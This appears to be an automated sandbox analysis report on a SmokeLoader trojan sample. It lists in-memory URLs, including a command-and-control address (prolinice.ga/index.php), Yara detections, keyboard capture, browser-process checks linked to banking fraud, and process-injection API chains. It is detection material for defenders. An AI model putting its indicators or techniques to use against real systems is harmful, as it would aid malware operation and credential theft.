                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 06:25:41 GMTServer: Apache/2.4.59 (Debian)Content-Length: 168Connection: closeContent-Type: text/html; charset=utf-8Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/=
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003250000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.1944673317.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.1955894344.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2944561786.0000000000698000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2127081102.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2944628748.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2943892684.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2944692360.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2943579031.00000000004E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.1944673317.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.1955894344.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2944561786.0000000000698000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2127081102.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2944628748.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2943892684.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2944692360.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2943579031.00000000004E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
                    Source: explorer.exe, 00000006.00000002.1956613264.000000000327F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga:80/index.php
                    Source: explorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                    Source: explorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                    Source: explorer.exe, 00000001.00000000.1727963617.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1728370033.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1729676503.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                    Source: explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                    Source: explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                    Source: explorer.exe, 00000001.00000000.1726526540.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: explorer.exe, 00000001.00000000.1728897911.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                    Source: explorer.exe, 00000001.00000000.1728897911.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                    Source: explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR
                    Source: Yara matchFile source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\rrrrcve, type: DROPPED
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_006D162B GetKeyboardState,ToUnicode,16_2_006D162B

                    E-Banking Fraud

                    barindex
                    Checks if browser processes are running
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe9_2_00382EA8
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, firefox.exe9_2_00383862
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, iexplore.exe9_2_00383862
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, microsoftedgecp.exe9_2_00383862
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, chrome.exe9_2_00383862

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    PE file has a writeable .text section
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: rrrrcve.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014BF
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,0_2_00402321
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004025D3 NtClose,0_2_004025D3
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014D6
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022D8
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022D9
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022E5
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014E8
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014EB
